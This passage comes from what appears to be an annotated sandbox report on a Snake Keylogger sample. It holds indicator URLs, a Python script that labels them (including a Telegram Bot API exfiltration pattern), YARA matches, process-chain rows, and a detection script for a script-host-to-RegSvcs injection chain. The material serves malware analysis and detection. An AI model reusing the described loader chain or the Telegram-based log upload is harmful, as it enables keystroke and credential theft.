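    "https://reallyfreegeoip.org/xml/155.94.241.187d",
    "https://reallyfreegeoip.org/xml/155.94.241.187l",
]

# Label table, first match wins. Labels are this example's interpretation;
# "unclassified" means an analyst still has to look at it.
LABELS = [
    (r"^https://api\.telegram\.org/bot", "exfiltration: Telegram Bot API"),
    (r"^https?://checkip\.dyndns\.", "recon: public IP lookup"),
    (r"^https?://reallyfreegeoip\.org", "recon: IP geolocation"),
    (r"^http://\d{1,3}(\.\d{1,3}){3}(:\d+)?/", "stage download: raw IP, plain HTTP"),
    (r"^http://schemas\.xmlsoap\.org/", "benign: .NET/WS-* schema URI"),
]


def normalize_urls(urls):
    """Collapse trailing-byte artifacts, repeating until nothing changes.

    Rule 1: if a URL minus its last letter is itself an observed URL, drop
            the letter ('comd' -> 'com').
    Rule 2: if two observed URLs differ only in their last character, keep
            the common prefix ('187d' / '187l' -> '187').
    A trailing '/' is never stripped: that is a real URL, not debris.
    """
    current = set(urls)
    while True:
        nxt = set()
        for u in current:
            stem = u[:-1]
            sibling = any(w != u and len(w) == len(u) and w[:-1] == stem for w in current)
            if u[-1].isalnum() and (stem in current or sibling):
                nxt.add(stem)
            else:
                nxt.add(u)
        if nxt == current:
            return current
        current = nxt


def classify(url):
    for pattern, label in LABELS:
        if re.search(pattern, url):
            return label
    return "unclassified: review manually"


def triage(strings):
    """Return {normalized_url: label} for every URL found in the strings."""
    urls = {m.group(0) for s in strings for m in re.finditer(r"https?://\S+", s)}
    return {u: classify(u) for u in sorted(normalize_urls(urls))}


def telegram_endpoint(url):
    """Split a Bot API URL into (token_field, method), or None if not one.

    In this sample the token field is just '-': the real token is filled
    in at runtime, which is why the configuration had to be recovered
    from process memory rather than from the dropped script.
    """
    m = re.match(r"^https://api\.telegram\.org/bot([^/]*)/([A-Za-z]+)", url)
    return (m.group(1), m.group(2)) if m else None


if __name__ == "__main__":
    for url, label in triage(MEMORY_STRINGS).items():
        print(f"{label:40} {url}")
```

Running it reduces the nineteen raw strings to twelve distinct URLs. The `bot-/sendDocument?chat_id=` row is the one worth blocking on: `sendDocument` is the Bot API method for uploading a file, which is how a keylogger ships its collected log, and the empty token field tells you the credential lives only in memory.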

                System Summary

                Source: amsi64_1888.amsi.csv, type: OTHER | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: 12.2.RegSvcs.exe.1160000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 12.2.RegSvcs.exe.1160000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0000000C.00000002.2949838278.0000000001162000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: RegSvcs.exe PID: 5184, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                Source: C:\Windows\System32\wscript.exe | COM Object queried: WinHttpRequest Component version 5.1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2087c2f4-2cef-4953-a8ab-66779b670495}
                Source: C:\Windows\System32\wscript.exe | COM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}
                Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}
                Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
                Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
                Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
                Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_01618268
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_0161AA68
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_0161EF88
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_016119B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_01618259
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_0161E5E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_0161E5D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_0161AA58
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_0161ED68
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_01612DD1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_0161F658
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_0161FB08
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_0161FAF8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_05BF7710
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_05BF6628
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_05BF5FD8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_05BF7A68
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_05BF0498
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_05BF048B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_05BF2438
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_05BF2428
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_05BF37D8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_05BF37C8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_05BF1730
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_05BF1723
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_05BF7700
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_05BF6622
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_05BF3130
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_05BF3140
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_05BF0006
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_05BF0040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_05BF5332
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_05BF5340
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_05BF42B9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_05BF12D8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_05BF42C8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_05BF12C8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_05BF2CE8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_05BF2CD9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_05BF6C70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_05BF6C60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_05BF1FE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_05BF1FD1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_05BF5FCC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_05BF0E80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_05BF0E70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_05BF5988
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_05BF5978
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_05BF2890
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_05BF2880
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_05BF1B88
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_05BF1B78
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_05BF0A28
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_05BF0A17
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_06E34EC8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_06E3326C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_06E3BBAB
                Source: amsi64_1888.amsi.csv, type: OTHER | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: 12.2.RegSvcs.exe.1160000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 12.2.RegSvcs.exe.1160000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0000000C.00000002.2949838278.0000000001162000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: RegSvcs.exe PID: 5184, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: classification engine | Classification label: mal100.troj.spyw.expl.evad.winVBE@16/19@3/4
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4820:120:WilError_03
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Mutant created: NULL
                Source: C:\Windows\System32\wermgr.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2380:120:WilError_03
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: \Sessions\1\BaseNamedObjects\PSReadLineHistoryFile_26550411
                Source: C:\Windows\System32\wermgr.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2248:120:WilError_03
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5816:120:WilError_03
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uaqt2amc.jfd.ps1
                Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\pcPseOUmXnpEaeF.vbs"
                Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='RegSvcs.exe'
                Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
                Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='RegSvcs.exe'
                Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
                Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='RegSvcs.exe'
                Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='RegSvcs.exe'
                Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='RegSvcs.exe'
                Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='RegSvcs.exe'
                Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
                Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: unknown | Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                Source: RegSvcs.exe, 0000000C.00000002.2951280494.00000000031C1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2951280494.00000000031D0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2951280494.00000000031DF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Ref#150062.vbe"
                Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\pcPseOUmXnpEaeF.vbs"
                Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\pcPseOUmXnpEaeF.vbs"
                Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
                Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: unknown | Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "7064" "2696" "2648" "2700" "0" "0" "2704" "0" "0" "0" "0" "0"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "1888" "2588" "2776" "2068" "0" "0" "2076" "0" "0" "0" "0" "0"
                Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
                Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "7064" "2696" "2648" "2700" "0" "0" "2704" "0" "0" "0" "0" "0"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "1888" "2588" "2776" "2068" "0" "0" "2076" "0" "0" "0" "0" "0"
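The process rows above describe the execution chain that matters for detection: wscript.exe runs the .vbe, starts powershell.exe with an empty command line (the script feeds it commands another way, so nothing useful lands in the command-line field), and that PowerShell starts RegSvcs.exe, again with no arguments, which is then used as the host for the injected keylogger. The repeated `SELECT * FROM Win32_Process WHERE Name='RegSvcs.exe'` queries from wscript.exe are consistent with the dropped script polling for its payload. The script below is an added example and not a Joe Sandbox or Sigma rule: it applies that logic to process-creation events in Sysmon Event ID 1 shape. The events are constructed to mirror the rows above; PIDs 5184 (RegSvcs.exe, from the Yara row) and 4820 (conhost, from its mutant name) come from the report, 7064 and 1888 are taken from the numeric arguments of the wermgr.exe rows on the assumption that they are the wscript and powershell PIDs, and the parent-child links and the two benign control rows are assumptions.

```python
"""Process-chain detection for the wscript -> powershell -> RegSvcs pattern.

Added example, not part of the Joe Sandbox report. Events are constructed
to mirror the process-creation rows; see the lead-in for which PIDs are
taken from the report and which are assumed.
"""

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# .NET Framework utilities that do nothing useful when started with an empty
# command line, which makes them favourite hosts for injected code.
DOTNET_HOSTS = {"regsvcs.exe", "regasm.exe", "installutil.exe", "msbuild.exe"}

# Constructed events (pid, ppid, image, cmdline), Sysmon Event ID 1 style.
EVENTS = [
    {"pid": 1000, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 7064, "ppid": 1000, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Ref#150062.vbe"'},
    {"pid": 1888, "ppid": 7064, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"'},
    {"pid": 4820, "ppid": 1888, "image": r"C:\Windows\System32\conhost.exe",
     "cmdline": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"},
    {"pid": 5184, "ppid": 1888, "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
     "cmdline": r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"'},
    # Benign control rows (assumed): an admin script that registers a real component.
    {"pid": 3000, "ppid": 1000, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -File C:\ops\register.ps1"},
    {"pid": 3100, "ppid": 3000, "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
     "cmdline": r"RegSvcs.exe C:\ops\Component.dll"},
]


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def has_no_arguments(cmdline, image):
    """True when the command line is just the executable, quoted or not.

    Anything after the image name (an assembly path, a switch) makes the
    last backslash-separated token differ from the image basename.
    """
    stripped = cmdline.strip().strip('"')
    return basename(stripped) == basename(image)


def ancestors(pid, by_pid, limit=8):
    """Image basenames from the process up to the root, at most `limit` hops."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen and len(chain) < limit:
        seen.add(pid)
        chain.append(basename(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return chain


def find_injection_chains(events):
    """Flag a .NET host utility started without arguments by a PowerShell
    whose own parent is a script host. One finding per flagged process."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        if basename(e["image"]) not in DOTNET_HOSTS:
            continue
        if not has_no_arguments(e["cmdline"], e["image"]):
            continue  # RegSvcs.exe with a real assembly argument is ordinary usage
        chain = ancestors(e["pid"], by_pid)
        # chain[0] is the process itself, chain[1] its parent, chain[2] the grandparent
        if len(chain) >= 3 and chain[1] == "powershell.exe" and chain[2] in SCRIPT_HOSTS:
            parent = by_pid[e["ppid"]]
            findings.append({
                "pid": e["pid"],
                "chain": list(reversed(chain[:3])),
                "powershell_no_args": has_no_arguments(parent["cmdline"], parent["image"]),
            })
    return findings


if __name__ == "__main__":
    for finding in find_injection_chains(EVENTS):
        print(finding)
```

The empty-command-line check is what keeps this precise: a PowerShell deployment script that runs `RegSvcs.exe Component.dll` is not flagged, while a RegSvcs.exe that was started with nothing to do, by a PowerShell that was itself started with nothing to do, by a script host, is. The `powershell_no_args` flag is reported separately because on its own it is already worth a lower-severity alert when the parent is wscript.exe or cscript.exe.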
                Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: mlang.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: winhttpcom.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: winhttp.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: webio.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: mswsock.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: iphlpapi.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: winnsi.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: textshaping.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: textinputframework.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: coreuicomponents.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: coremessaging.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: ntmarta.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: wbemcomn.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
